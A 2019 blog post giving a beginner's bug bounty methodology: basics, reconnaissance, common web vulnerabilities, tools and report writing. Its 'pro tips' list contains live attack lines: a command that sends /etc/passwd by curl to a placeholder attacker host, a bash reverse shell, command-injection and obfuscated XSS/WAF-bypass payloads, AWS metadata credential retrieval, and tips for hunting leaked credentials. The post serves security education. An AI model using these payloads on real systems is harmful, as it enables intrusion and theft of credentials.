Bug Bounty Methodology (TTP- Tactics, Techniques, and Procedures) V 2.0

Sanyam Chawla
30 min readOct 5, 2019

--

Hello Folks, I am Sanyam Chawla (@infosecsanyam) I hope you are doing hunting very well

TL: DR

This is the second write-up for bug Bounty Methodology (TTP ). Here is my first write up about the Bug Hunting Methodology Read it if you missed. I am very glad you liked that blog too much :). Most of the peoples are trying to find the right path to start in bug bounty, normal questions are how to find bugs on the targets and where I can start with the hunting. For this reason, I have planned to make one more write-up of bug bounty topic in contributing to the infosec community

What’s new in this blog? This is the blog that I mainly focus on Tactics, Techniques, and Procedures to hunt in bug bounty. This write-up is purely for newcomers to the bug bounty community (noobs to leets). This blog is cover in 3 parts where I will break down things to be as easy as possible. The first part gives an idea to clear concepts in a basic programming language, networking concepts, reconnaissance. The second part gives an idea about common vulnerabilities, proof of concepts, Bug bounty tips, Tools, Techniques, tutorials for self-study. The third Part gives ideas step by step to report your findings in a clear way. This Blog contains resources that I have collected from all over the internet with different blogs and adding them here to make a one TTP that contains all about getting started in Bug Bounty.

If you are an infosec beginner or a “bounty curious” leet hacker. This is the post for you!

So let’s start hunting without wasting time !! Hope you will learn something new after reading this blog

What is Bug Bounty?

A bug bounty program also called a (VRP), is a crowdsourcing initiative that rewards individuals for discovering and reporting software bugs.

To define Bug Bounty in a simple line “Bug Bounty is a reward paid to an Ethical Hacker for identifying and disclosing a potential security bug found in a participant’s Web, Mobile, and Infrastructure.

Part — 1 — Learn Basic Concepts

This part is focusing on beginners to share the right path before going to a bug bounty. This phase is for those who have already tried in bug hunting but failed for some reason like basic concepts are not clear. It will give an idea about the basics of programming, network protocols, automation, reconnaissance process.

Let's get some idea about programming language !!

Learn to write the code then you can easily break it

Below are some programming language blogs which is suggesting to get the basics understanding of these languages.

HTML:

JavaScript:

PHP:

Java:

SQL(Structured Query Language):

Resources to Learn Basics

What is HTTP?

What is Web?

Networking Concepts :

A basic idea of networking is very important for anyone who is using the computer: There are some blogs which is covered concepts in networking:

Basics of Linux commands :

Feeling Lazy to daily routine the same task?

Let's start to learn some automation language for bug hunting :)

Python

Golang

Bash

Conference notes for automation

You can learn these above languages for doing some automation tasks and create own tools for work faster and efficient.

After clearing the basic concepts we are going near to bug bounty part but before going I will share some ideas about reconnaissance and information gathering part !!

Reconnaissance & Enumeration ( Information Gathering)

The thing you need to remember, In bug bounty programs there is a lot of competition. When you’re taking part in a bug bounty program, you’re against the thousands of other people who are taking part in the program. For this reason, it’s important to think out of box and different thinking

What is Recon?

The important part is the recon comes first in order to determine the target(s) which normally consist of company and partner names, employee names, identification of technology vendors in use, identification of public IP ranges, primary top-level domains.

What is Enumeration?

Enumeration is defined as the process of extracting user names, machine names, network resources, shares and services from a system. In this phase, the attacker creates an active connection to the system and performs directed queries to gain more information about the target.

The following recon map I found on twitter which is very interesting, Use it wise.

Below are some tips for rights enumeration:-

After learning some basic idea about programming, networking, recon concepts lets move to the Hunting part

Part #2 — Vulnerabilities / POC / Tools / Bugbounty Tips

This part is basically for learning about web application vulnerabilities tools techniques and procedures ( POC — Vulnerabilities)

Books for reading about Bug Hunting Vulnerabilities

Below are some books for Web application penetration testing methodology and hunting the web. Through this, you learn the basics and essentials of penetration testing and bug hunting.

Web Security books

Mobile Hacking Books

Now at this point i’ll say You have done Good enough research

Practice makes Perfect!

Below are the some vulnerable machines and website for hands on before going to hunt on live websites.

After spending a good time to practice and learn on vulnerable machines and websites now we can jump into Bug bounty programs to test in real-life environments.

Following “10 rules of Bug Bounty”

  • Targeting the Bug Bounty Program
  • How do you Approach the Target ?
  • Don’t Expect Anything !
  • Less Knowledge about Vulnerabilities and Testing Methodologies
  • Surround yourself with Bug Bounty Community to keep yourself Updated
  • AUTOMATION
  • GET BOUNTY or GET EXPERIENCE
  • FIND THE “BUG” or FIND A “BUG’S CHAIN”
  • Read Master Path and Create your own path
  • RELAX & ENJOY LIFE

Bug Bounty Platforms :–

After doing reconnaissance and information gathering of particular target Now time to do hunt some common vulnerabilities which you will give priority to finding out when you doing bug hunting:-

Cross-Site Scripting (XSS)

XSS enables attackers to inject client-side scripts into web pages to get user information.

References:

Cross Site Scripting Tutorial & Pratical

Some POCs:

SQL Injection :

SQL injection is a kind of injection vulnerability in which the attacker tries to inject arbitrary pieces of malicious data(Code) into the input fields to get data from database.

References :

Sql Injection Practice Lab

Some POC:

Cross-Site Request Forgery (CSRF)

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated.

References:

Some POC

Remote Code Execution (RCE)

In RCE an attacker’s able to execute arbitrary commands or code on a target machine or in a target Machine.

References

Some POC

Insecure Direct Object Reference (IDOR)

In IDOR an application provides direct access to objects based on the user-supplied input. As a result of this vulnerability, attackers can bypass authorization and access resources in the system directly.

References to read:

Some POCs:

Unrestricted File Upload

As in name unrestricted file upload allows user to upload malicious file to a system to further exploit to for Code execution

References

Some POCs:

XML External Entity Attack (XXE)

XXE is an attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.

References

Some POCs:

Local File Inclusion (LFI)

The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a “dynamic file inclusion” mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.

References:

Some POCs:

Subdomain Takeover

A process of registering a non-existing domain name to gain control over another domain.

References

Some POCs:

Server-Side Request Forgery (SSRF)

By SSRF the attacker can abuse functionality on the server to read or update internal resources.

References:

Some POCs:

Deserialization

Insecure Deserialization is one of the owasp top 10 that allows attackers to transfer a payload using serialized objects.This happens when integrity checks are not in place and deserialized data is not sanitized or validated

POC

Race Condition

Business Logic Flaw

Authentication Bypass

Brute Force

HTTP Header Injection

Email Related

Money Stealing

CSS Injection :

EXIF Geolocation Data Not Stripped From Uploaded Images :

Chaining Bugs :

I will share some of the great write-ups which the researcher exploits with the chaining of vulnerabilities low vulnerability to critical vulnerabilities.

Open Redirection to XSS

Open Redirection to OAuth Token Stealing

Self XSS into good XSS:

LFI to RCE:

SSRF to XSS

SSRF to RCE:

SSTI to RCE:

Others

So these were some common issues that you should follow while bug hunting. Below are the topics that you do some research and read the blogs, proof of concepts on them.

Read tech Vulnerabilities POCs (Proof of Concepts) and write-ups from other hackers

Now that you’ve have understanding of security vulnerabilities., it’s time to start checking out what other hackers are finding in the wild. Luckily the security community is quite generous with sharing knowledge and we’ve collected a list of write-ups & tutorials:

Now Let’s get Towards YouTube Channel Links… These Channels are Shared By Hackers where They Upload their Video POC after fixation of issues as per responsible disclosure. Watch this once

Any Channel Link Missing? Kindly add it in Comments

Also follow http://h1.nobbd.de/ to b updated with HackerOne Public Bug reports You can learn a lot from them

Open Source Tools list for Bug Hunting

Subdomain Finding Websites :

Github Open Source tools for Subdomain Finding :-

Also Just don’t get limited to Subdomains Try extracting vhosts

tools like:-

Open Source tool list :-

Popular Google Dorks Use(finding Bug Bounty Websites)

  • site:.eu responsible disclosure
  • inurl:index.php?id=
  • site:.nl bug bounty
  • “index of” inurl:wp-content/ (Identify WordPress Website)
  • inurl:”q=user/password” (for finding drupal cms )

Passive Reconnaissance

Payloads for Hunting

Bug Bounty Pro Tips

  • Pro Tip — Android applications can suffer from LFI and stored XSS just by injecting <iframe/src=/etc/hosts> into input fields. Payout: $4,500! by xer0dayz
  • Tip for finding SSRF by @roughwire
  • #bugbounty tip by @jmelika: To demonstrate XSS impact, don’t use alert(‘alert’). Determine whether session is stored in cookies or local storage and put that in the popup. cookie: alert(document.cookie) LocalStorage: alert(localStorage.getItem(‘access_token’))
  • #bugbounty tip by Jakemenaga : This Cool Tip To Find Jenkins Dashboards In Shodan `http.favicon.hash:81586312`
  • CSRF tip by Mikhel : You can send 𝐭𝐞𝐱𝐭/𝐩𝐥𝐚𝐢𝐧; 𝐚𝐩𝐩𝐥𝐢𝐜𝐚𝐭𝐢𝐨𝐧/𝐣𝐬𝐨𝐧 Content-Type header cross domain without triggering CORS. Backend might think that content type is application/json
  • by @m0z : A useful tip for finding Full Path Disclosure vulnerabilities: drop an array ([] or even [1,2,3]) into a parameter. This can produce a full path disclosure error.
  • #BugBounty Tip by Prateek Tiwari: If you’ve found an IDOR where you’re able to change data of others then don’t jump out of your seat to report it > modify it to XSS payload & if inputs are not sanitized & variables are echo’d without getting escaped then IDOR>XSS>ATO
  • #Bugbounty Tip : If you want to know the name of inside-site s3 bucket — just put %c0 in to the url
  • #Bugbounty tip : if the target is using Cloudflare , dig in their dns record and search for the origin ip address. If you attack the application directly by his IP’s cloudflare WAF will not be there.
  • #Bugbounty Tip :Search Jira Instances in @Google query — inurl: jira AND intitle:login AND inurl:[company name]
  • #Bugbounty Tip by Jason Haddix : Found a 401/403 , basic auth or domain that seems interesting but is somehow locked down? Look at its archive.org/web/ entries. Sometimes you win instantly with API keys or url structure that you can forcefully browse to unprotected content still there.
  • #Bugboutny Tip by Sri Ram : When starting a program, use this dork. site: prog.com inurl:lang= or inurl:locale= Most of the time you will get a CRLF injection in there if its being reflected
  • #Bugbouty Tip by Emad Shanab :- Oracle Weblogic Server UDDI Explore SSRF Bug Google dork : inurl:/uddiexplorer
  • #Bugbounty tip by Avinash Jain (@logicbomb_1) :- To discover deployed on Github for subdomain takeover , following google dork can be used : intext: “ There isn’t a github pages site here” and intitle:”Site not found . Github Pages”
  • #Bugbounty tip by @knowledge_2014 :- Try blind xss injection in to user-agent or referrer/origin headers, in case that payload seems not executed try again with url encoding or double encoding. Sometime works like a charm !!
  • #Bugbounty tip by @404death :- XSs Payload <svg/onload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;//
  • #Bugbounty tip by @SpenGietz :- #AWS tip : Did you knw that even though the majority of the EC2 metadata API is disabled in AWS Glue Dev Endpoints, you can still retrieve temporary credentials for the attached role by curling “http://169.254.168.254/latest/meta-data/iam/security-credentials/dummy”?
  • #Bugbounty tip by @knowledge_2014 :- Most of the time when you test rest api you will see PATCH/PUT/DELETE request. Change request order to see which behavior as output has the app.
  • #Bugbounty tip by @ESec haxor :- A little trick to try to bypass some filters use %0D! = <! — */’*/!>%0D<svg/onload=confirm’1’//
  • # Bugbounty tip :– Finding Durpal : inurl:”/user/register” “Powered by Drupal” -CAPTCHA -”Access Denied” or inurl:”user/register?element_parents=account/mail” inurl:”*drupal_ajax”
  • #Bugbounty tip by @c1h2e1 :- #BugBounty #BugBountyTips #bugbountytip via burpsuite search to find some open redirect , search “=http” or “=aHR0”(base64 encode http) from “Request header” and status code 30X you also can use this tip to find some SSRF
  • #Bugbounty Tip by Sanyam Chawla:- Read once ‘ Web application hacker handbook’ you will understand basics of web app, then its easy to exploit the code
  • Focus on enumeration part. Enumeration is a key.
  • #Bugbounty Tip by Vanshit :- Bypass AWS WAF -// Add “<!” (without quotes) before your payload and bypass that WAF.
  • eg: <!<script>confirm(1)</script>
  • Try to recon https://storage.googleapis.com/Org-name-here you may find internal documentation which aren’t supposed to be public.
  • If you got ‘Subdomain Takeover’ don’t report it yet, look at the main site/app for gain privileges: like a potential CSP policy bypass (or session hijacking via Set-cookie: *.domain.com
  • Always bruteforce http://subdomain.corp.website.com and *.dev.*
  • Look for port 9200{elastic search) and find juicy stuff,Use shodan.io using org:”org name”query
  • Found an s3 bucket behind the CDN,Change to https it might reveal up
  • Search for public Trello boards of companies, to find login credentials, API keys, etc. or if you aren’t lucky enough, then you may find companies’ Team Boards sometimes with tasks to fix security vulnerabilities
  • remember that Github is your friend — Check dotfiles of company’s employees — Search for DevOps projects shared (fork) between employees (ansible, Cassandra, Azure,..) => you get Login credential, API key, Private keys — Always follow the manual approach
  • Use https://cse.google.com/cse/all and create a custom search for *http://target.com , It works neat for targets with big scope.
  • Blind RCE — Grabs /etc/passwd and dumps it to your netcat listener via POST `cat /etc/passwd | curl -X POST -d @- http://yourip:yourport/`
  • Blind RCE-turn it in to a reverse shell! |`bash -i >& /dev/tcp/yourip/yourport 0>&1`
  • Sometimex xss payload : <sVg/oNloAd=”JaVaScRiPt:/**\/*\’/”\eval(atob(‘Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==’))”> <iframe src=jaVaScrIpT:eval(atob(‘Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==’))>
  • Search for hidden (and visible) input fields and try to set the value via GET… a lot of Webapps still use $_REQUEST… you will be surprised
  • if you have a reflected value -> check of html/script injection
  • If server only allows GET and POST method, then try adding “X-HTTP-Method -Override: PUT to achieve RCE via PUT method.
  • If you have found server (http://foo.company.com ) which redirects you immediately to http://bar.company.com , always run resources enumeration (dirb, wfuzz etc.) against http://foo.company.com You can find something “hidden” sometimes
  • It’s possible to bypass #CSP with the following : #JSONP: <script src=”https://trustedsite/jsonp?callback=payload“> #AngularJS <script src=”https://trustedsite/angularjs/1.1.3/angularjs.min.js“> <div ng-app ng-csp id=p ng-click=$event.view.alert(1)>
  • Xss on s3 buckets alerts on s3 domain, it’s a low priority bug. Better find a reflected xss on main domain and iframe it on s3 xss. You can get an account takeover.
  • Change the User-Agent to your blind XSS payload and traverse the site. Like visiting site links, filling some forms etc. Sometimes blind XSS may fired if you are lucky enough.
  • A single #RCE payload rule them all , easy 6000$
  • 1;sleep${IFS}9;#${IFS}’;sleep${IFS}9;#${IFS}”;sleep${IFS}9;#${IFS}
  • If you get a shell on a machine with ~/.aws/credentials further esculate to the actual bucket or ec2 instances. Commands: aws s3 ls s3://XXX/directory/ — profile username and aws ec2 describe-instances — profile username.
  • Here is my obfuscated payload. It bypasses lots of WAF, including CloudFlare iirc. <iframe src=”%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)”> iFrame with javascript URI payload. Line feeds [CRLF] obfuscate it.
  • Sometimes user input is reflected into a value without any quotations. Eg:<input value={input}> Just add a space and you can now inject onfocus=alert(0) autofocus for XSS! Works even against htmlspecialchars().
  • Port 50070 hadoop No authentication Access to logs and read write access to directories.
  • Hunting For Endpoints while Bughunting developer options Could Be handy for u press ctrl+shift+j click on network and reload the page , few endpoints ,url’s and also u can find subdomain too.
  • If you want to put spaces in a cmd: #<!ENTITY xxe SYSTEM “expect://ls$IFS-la$IFS/”>]>
  • Captcha bypass: -The Captcha generated based on a given MD5 string — Wrote a bot to randomly generate MD5 of 6 characters string and use it as Captcha to login !

Need more BugboutyTips ? Go to twitter and search below hashtags:-

I hope the Path Guide i’m trying to share here clears doubts for many newcomers in Bug Bounty Hunting.

Let’s move to Part #03

Part — 03 — Approach / Reporting

This part is all about selecting a target, approach for finding the bugs and after finishing testing writing a good report

Selecting and Approaching a Target?

For Bug bounty programs, First I’m going to review the scope of the target. There’s a huge difference between a scope such as *.facebook.com versus a small company’s single application test environment.

If the scope is big then they accept submissions for any of their servers, I’m going to start doing reconnaissance using search engines such as Google, Shodan, Censys, ARIN, etc. to discover subdomains, endpoints, and server IP addresses. This is a mix of Google Dorking, scanning IP ranges owned by companies, servers ports scanning, etc. Anything that gives me information on servers that may be owned by that company.

When I have a list of servers, I start to perform recon nmap port and banner scanning to see what type of servers are running. Don’t forget to keep notes of everything you do. You may get some quick finds such as open SSH ports that allow password-based authentication. At this point I tend to stay away from reporting those smaller issues. I opt to spend more time looking for critical applications running on non-standard web ports such as Jenkins that may have weak default configuration or no authentication in front of them.

Before I hunt into the websites too deeply, I first do a quick run through the web servers looking for common applications such as WordPress ,Drupal , joomla etc . This is a mix of just browsing the sites manually or directory hunting by using wordlist, looking for sitemaps, looking at robots.txt, etc. I look for low hanging fruits or surface bugs. There is no point focusing your efforts on those but keeping track of them is really helpful. I understand the application workflow/requests via a proxy tool such as Burp or Zap.

Then dig in to website, check each request and response and analysis that, I’m trying to understand their infrastructure such as how they’re handling sessions/authentication, what type of CSRF protection they have (if any).

Sometimes I use negative testing through the error, this Error information is very helpful for me to finding internal paths of the website. I spend most of my time trying to understand the flow of the application to get a better idea of what type of vulnerabilities to look for.

Once I’ve done all of that, depending on the rules of the program, I’ll start to dig into using scripts for word-list brute-forcing endpoints. This can help with finding new directories or folders that you may not have been able to find just using the website. This tends to be private admin panels, source repositories they forgot to remove such as /.git/ folders, or test/debug scripts. After that check, each form of the website then tries to push client-side attacks. Use multiple payloads to bypass client-side filters. Best tools for all over the Bug Bounty hunting is “BURP SUITE”

This is just the methodology for Bug bounty hunting and Penetration :)

My Tips & Tricks

  • Bug Bounty Hunting Tip #1- Always read the Source Code
  • Bug Bounty Hunting Tip #2- Try to Hunt Subdomains
  • Bug Bounty Hunting Tip #3- Always check the Back-end CMS & backend language (builtwith)
  • Bug Bounty Hunting Tip #4- Google Dorks is very helpful
  • Bug Bounty Hunting Tip #5- Check each request and response
  • Bug Bounty Hunting Tip #6- Active Mind — Out of Box Thinking

My Methodology for Bug Hunting

  • First review the scope
  • Perform reconnaissance to find valid targets
  • Find sub-domains through various tools Sublist3, virus-total etc.
  • Select one target then scan against discovered targets to gather additional information (Check CMS, Server and all other information which i need)
  • Use google dorks for information gathering of a particular target
  • Review all of the services, ports and applications.
  • Fuzz for errors and to expose vulnerabilities
  • Attack vulnerabilities to build proof-of-concepts

Reporting a Vulnerability?

Legend has it that the best bug bounty hunters can write reports in their sleep. OK, jokes aside, while writing reports is a very important part of bug bounty hunting, we can simplify this whole process by following these basic guidelines.

Summary

The first section of your report should start with a brief summary introducing the reader to your finding. Summaries can be as simple as:

example.com is vulnerable to reflected XSS via the q parameter.

Or as detailed as:

https://imgur.com/vidgif/url endpoint is vulnerable to a SSRF vulnerability which allows an attacker to craft connections originating from imgur servers to any destination on the internet and imgur internal network and craft outgoing UDP-packets / telnet-based protocol sessions (for example, to connect to SMTP servers from imgur and send spam). [1]

Vulnerability Description

This section covers all the details related to your finding. State what you found again, make the technical points clear, and explain what causes the issue. There are exceptions though where this section can be skipped. There is a popular English idiom:

“A picture is worth a thousand words.”

The same can be said about an excellent proof of concept:

“A phenomenal security vulnerability proof of concept is worth a thousand words.”
– Probably Gandhi

Proof of concept

The proof of concept is where you really need to demonstrate the impact in the “flashiest” way possible. Make it as easy as possible for the program to see what the issue is. If your issue is cross-site scripting, then an alert(document.domain) can go a long way to help the program figure out where the issue lies.

Browsers verified in

Even if the issue is not browser-dependent, it is good practice to inform the program about what browser you used to trigger the vulnerability. This can help the team behind the bug bounty program reproduce your finding.

  • Google Chrome: visit chrome://version/
  • Mozilla Firefox: top-right menu icon → ? “Help” → “About Firefox”
  • Microsoft Internet Explorer: top-right cog → “About Internet Explorer”
  • Microsoft Edge: → “Settings” → scroll down

Mitigation

If you followed the advice in “How do I get started with bug bounty hunting?”, you should be capable of giving a brief description of how the bug bounty program should fix your finding. It is also a good idea to link to the relevant OWASP Prevention cheat sheet.

Report Writing Well that’s all Folks Hopefully my way of doing basic recon can help you to properly Select the target-Map it out properly-Hunt it down using the information you have gathered and At the end Writing a Report suggestion is to read the blog https://blog.bugcrowd.com/advice-for-writing-a-great-vulnerability-report/

Good Report Example :

1. https://hackerone.com/reports/73567

2. https://bugbountyguide.com/hunters/writing-reports.html

Some great resources for vulnerability report best practices are:

Well, I guess this is where I’ll end this blog and I hope these resources will helpful for your bug hunting. As Mentioned before this Guide is basically for people who are absolutely new or are still looking for a proper way about what to learn first and from where.

At Last but not least!

As a security researcher, It is very difficult to keep yourself up to date. For beginners, I recommended to do self-study and learn things instead of going to any institute. Google is very wide, you can use it to explore the things and getting knowledge on each and every topic whatever you want. Its all about your passion for taking a step after that you can achieve anything. Nothing is impossible to achieve. In reality, all I achieved as of now was by doing self-study on google and self-motivation. In the end, I’m not leet and I am still learning in the cybersecurity field and trying my best to share knowledge.

Credit Goes to all below links where I get useful information

Failure will never overtake me if my determination to succeed is strong enough

Well, thanks for reading this write-up Hope you like it, Feel free to connect me through Linkedin or Twitter

If I missed something, kindly comment below so i will add to the Bug Bounty- Infosec List- If you like this blog then share with your friends

Social media contact information as below.

About Me: https://cyberzombie.in/about/

Linkedin: www.linkedin.com/in/infosecsanyam

Twitter: https://twitter.com/9thplayer

Medium: https://medium.com/@infosecsanyam

--

--

Sanyam Chawla

OSCP || RedTeam Member @ Synack || PenTester || Bug Bounty Hunter